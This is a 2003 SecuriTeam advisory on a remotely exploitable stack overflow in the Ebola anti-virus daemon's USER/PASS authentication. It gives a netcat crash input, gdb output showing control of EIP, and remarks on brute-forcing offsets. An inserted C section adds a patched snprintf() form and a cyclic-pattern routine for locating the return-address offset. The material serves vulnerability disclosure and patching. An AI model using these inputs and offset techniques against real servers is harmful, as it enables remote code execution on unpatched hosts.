[UNIX] PLDaniels Ebola Remote Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 12/07/03
To: list@securiteam.com Date: 7 Dec 2003 17:14:03 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PLDaniels Ebola Remote Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://pldaniels.com/ebola/> Ebola is an anti-virus scanning daemon that
considerably improves the performance of scanning systems such as AMaViS,
Inflex and other programs that require on-demand scanning from various AV
engines. The Ebola daemon contains a remotely exploitable stack buffer
overflow in its authentication sequence: an unauthenticated client can
trigger it with an overly long USER or PASS value.
DETAILS
Immune systems:
* Ebola version 0.1.5
Vulnerable systems:
* Ebola version 0.1.4 and prior
This issue is caused by an unbounded sprintf() in the handle_PASS() function
in ebola.c: the username and password supplied by the client are formatted
into a fixed 100-byte stack buffer with no length check.
    char outstr[100];
    ..
    if (passwd) {
        if (PASS_authenticate(username, passwd) == _PASS_OK) {
            sprintf(outstr, "PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n",
                    username, passwd);
    ..
Exploiting this issue is fairly simple: by providing either an overly long
password or an overly long username you overflow the 100-byte buffer and
overwrite the saved return address (EIP) on the stack.
bash-2.05b$ nc localhost 1665
Welcome to Ebola v0.1.4
user ZZZZXXX
USER name received, please send PASS
pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ABCD
PASS NOT ACCEPTED for user "ZZZZXXX", pass "AAAAAAAAAAA...
A quick look in gdb confirms that this is a vanilla stack overflow: the
trailing "ABCD" of the password ends up in the saved return address, so the
function returns to 0x44434241 ("ABCD" read as a little-endian word).
[root@RiotStarter root]# gdb ebola 10440
Attaching to process 10440
Reading symbols from /home/dotslash/ebola-0.1.4/ebola...
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbffba7c4 -1074026556
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xbffbaa10 0xbffbaa10
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x44434241 0x44434241
The master ebola process never dies: it forks a child per connection and
continues to spawn children regardless of how many times a child is crashed
by an exploit attempt. Because of this you can brute force both the distance
to the saved EIP and the addresses used for the shellcode, reconnecting after
each failed attempt.
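The overflow arithmetic above and the brute-force remark can both be checked without the daemon. The following is an added example written by the editor, not code from the advisory or from Ebola: it reproduces the reply format quoted from handle_PASS() (OUTSTR_SIZE and PASS_FMT are taken from the excerpt; every function name is the editor's), computes the shortest PASS that runs past the 100-byte buffer, shows the bounded snprintf() form a fix needs, and decodes the 0x44434241 crash address. It goes beyond the text in one respect: instead of brute-forcing the distance to EIP across repeated connections, it builds a non-repeating "Aa0Aa1Aa2..." pattern once and looks the faulting EIP up in it.

```c
/* Added example (editor's code, not from the advisory or from Ebola).
 * OUTSTR_SIZE and PASS_FMT come from the handle_PASS() excerpt; all
 * function names below are the editor's own. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OUTSTR_SIZE 100   /* char outstr[100] in the excerpt */
#define PASS_FMT "PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n"

/* Bytes sprintf() would write into outstr, terminating NUL not counted. */
size_t pass_reply_len(const char *username, const char *passwd)
{
    int n = snprintf(NULL, 0, PASS_FMT, username, passwd);
    return n < 0 ? 0 : (size_t)n;
}

/* 1 if the original unbounded sprintf() runs past the 100-byte buffer. */
int pass_reply_overflows(const char *username, const char *passwd)
{
    return pass_reply_len(username, passwd) + 1 > OUTSTR_SIZE;
}

/* Shortest all-'A' PASS that overflows for the given USER, or (size_t)-1. */
size_t min_overflowing_pass_len(const char *username)
{
    char pw[1024];
    for (size_t plen = 0; plen < sizeof pw; plen++) {
        memset(pw, 'A', plen);
        pw[plen] = '\0';
        if (pass_reply_overflows(username, pw))
            return plen;
    }
    return (size_t)-1;
}

/* Hardened form: bounded write and an explicit refusal instead of a silently
 * truncated (or overflowed) reply. Returns 0 if the reply fit, -1 otherwise. */
int handle_pass_safe(char *out, size_t outsz, const char *username, const char *passwd)
{
    int n = snprintf(out, outsz, PASS_FMT, username, passwd);
    if (n < 0 || (size_t)n >= outsz) {  /* n is the length snprintf wanted */
        if (outsz) out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Same check against a local 100-byte outstr, as handle_PASS() would use it. */
int pass_reply_fits(const char *username, const char *passwd)
{
    char outstr[OUTSTR_SIZE];
    return handle_pass_safe(outstr, sizeof outstr, username, passwd);
}

/* The 4 bytes of the oversized PASS that land on the saved return address,
 * read back as the little-endian word gdb reports: "ABCD" -> 0x44434241. */
uint32_t eip_from_tail(const char *tail4)
{
    const unsigned char *t = (const unsigned char *)tail4;
    return (uint32_t)t[0] | (uint32_t)t[1] << 8 | (uint32_t)t[2] << 16 | (uint32_t)t[3] << 24;
}

/* Non-repeating "Aa0Aa1Aa2..." pattern: at most bufsz-1 bytes plus a NUL.
 * Returns the number of pattern bytes written. */
size_t make_cyclic_pattern(char *buf, size_t bufsz)
{
    size_t i = 0, max = bufsz ? bufsz - 1 : 0;
    for (char a = 'A'; a <= 'Z' && i < max; a++)
        for (char b = 'a'; b <= 'z' && i < max; b++)
            for (char c = '0'; c <= '9' && i < max; c++) {
                char trip[3] = { a, b, c };
                for (int k = 0; k < 3 && i < max; k++)
                    buf[i++] = trip[k];
            }
    if (bufsz) buf[i] = '\0';
    return i;
}

/* Offset into the pattern at which the 4 bytes now in EIP were sent,
 * or -1 if EIP does not come from the pattern at all. */
int pattern_offset(const char *pattern, size_t len, uint32_t eip)
{
    unsigned char needle[4] = { (unsigned char)(eip & 0xff), (unsigned char)(eip >> 8 & 0xff),
                                (unsigned char)(eip >> 16 & 0xff), (unsigned char)(eip >> 24 & 0xff) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (int)i;
    return -1;
}

/* One simulated round trip: send a patlen-byte pattern, take the EIP the
 * child crashed with, and recover the offset at which to place an address. */
int offset_from_crash(size_t patlen, uint32_t eip)
{
    char pat[2048];
    size_t n = make_cyclic_pattern(pat, patlen + 1 < sizeof pat ? patlen + 1 : sizeof pat);
    return pattern_offset(pat, n, eip);
}

int main(void)
{
    printf("shortest overflowing PASS for USER ZZZZXXX: %zu bytes\n",
           min_overflowing_pass_len("ZZZZXXX"));
    printf("EIP from trailing \"ABCD\": 0x%08x\n", eip_from_tail("ABCD"));
    printf("offset of EIP 0x%08x in a 255-byte pattern: %d\n",
           eip_from_tail("Aa3A"), offset_from_crash(255, eip_from_tail("Aa3A")));
    return 0;
}
```

The fixed text of the format string is 40 bytes, so with the 7-byte username from the session above any password of 53 bytes or more already writes past outstr; the pattern lookup replaces the length-guessing loop the advisory describes with a single crash, but the per-connection fork is still what makes repeated attempts cheap when the shellcode address has to be guessed.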
Vendor Status:
Paul L Daniels promptly responded to this issue, a patch was available
immediately after it was reported.
ADDITIONAL INFORMATION
The information has been provided by <mailto:dotslash@snosoft.com> KF.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.